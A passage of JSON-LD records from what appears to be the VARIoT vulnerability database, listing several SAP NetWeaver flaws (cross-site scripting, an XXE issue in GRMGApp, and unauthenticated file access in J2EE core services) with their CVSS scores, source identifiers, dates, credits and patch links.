"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001074"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-343"
}
],
"trust": 0.6
}
}
var-201106-0298
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The input passed to the testServlet servlet in the performanceProviderRoot application via the \"test\" parameter lacks filtering before returning to the user, which can lead to cross-site scripting attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201106-0298",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.x"
}
],
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The input passed to the testServlet servlet in the performanceProviderRoot application via the \\\"test\\\" parameter lacks filtering before returning to the user, which can lead to cross-site scripting attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2386"
},
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-2386",
"trust": 0.8
},
{
"db": "IVD",
"id": "DACE2DC2-1F91-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"id": "VAR-201106-0298",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"last_update_date": "2022-05-17T02:06:04.092000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4227"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=324"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2386"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2386"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "dace2dc2-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201207-0713
Vulnerability from variot
SAP Netweaver is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability. An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. SAP Netweaver 7.0 is vulnerable; other versions may also be affected.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201207-0713",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "55810"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastuchin of ERPScan",
"sources": [
{
"db": "BID",
"id": "55810"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability.\nAn attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\nSAP Netweaver 7.0 is vulnerable; other versions may also be affected.",
"sources": [
{
"db": "BID",
"id": "55810"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "55810",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "55810"
}
]
},
"id": "VAR-201207-0713",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:07:17.560000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-031-sap-netweaver-mobile-xs/"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-032-sap-netweaver-7-0-information-disclosure/"
}
],
"sources": [
{
"db": "BID",
"id": "55810"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "55810"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "55810"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-07-30T00:00:00",
"db": "BID",
"id": "55810"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "55810"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Cross Site Scripting and Information Disclosure Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "55810"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "55810"
}
],
"trust": 0.3
}
}
var-201311-0368
Vulnerability from variot
GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue. SAP NetWeaver of GRMGApp Contains vulnerabilities that are unspecified. Successful exploits may allow an attacker to obtain sensitive information or bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0368",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6822"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin of ERPScan",
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
],
"trust": 0.9
},
"cve": "CVE-2013-6822",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-6822",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6822",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-293",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue. SAP NetWeaver of GRMGApp Contains vulnerabilities that are unspecified. \nSuccessful exploits may allow an attacker to obtain sensitive information or bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"db": "BID",
"id": "58095"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6822",
"trust": 2.7
},
{
"db": "BID",
"id": "58095",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005201",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-293",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"id": "VAR-201311-0368",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:58:04.783000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6822"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6822"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6822"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/58095"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-01-28T00:00:00",
"db": "BID",
"id": "58095"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"date": "2013-11-20T14:12:31.023000",
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-293"
},
{
"date": "2013-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-25T01:04:00",
"db": "BID",
"id": "58095"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005201"
},
{
"date": "2018-12-10T19:29:02.093000",
"db": "NVD",
"id": "CVE-2013-6822"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-293"
},
{
"date": "2013-02-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver GRMGApp Security Bypass and Information Disclosure Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-293"
}
],
"trust": 0.6
}
}
var-201302-0414
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP J2EE core services provide various features through different protocols. A service lacks proper authentication and authorization, allowing remote unauthenticated attackers to read and write arbitrary files in the SIDADM user context
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0414",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
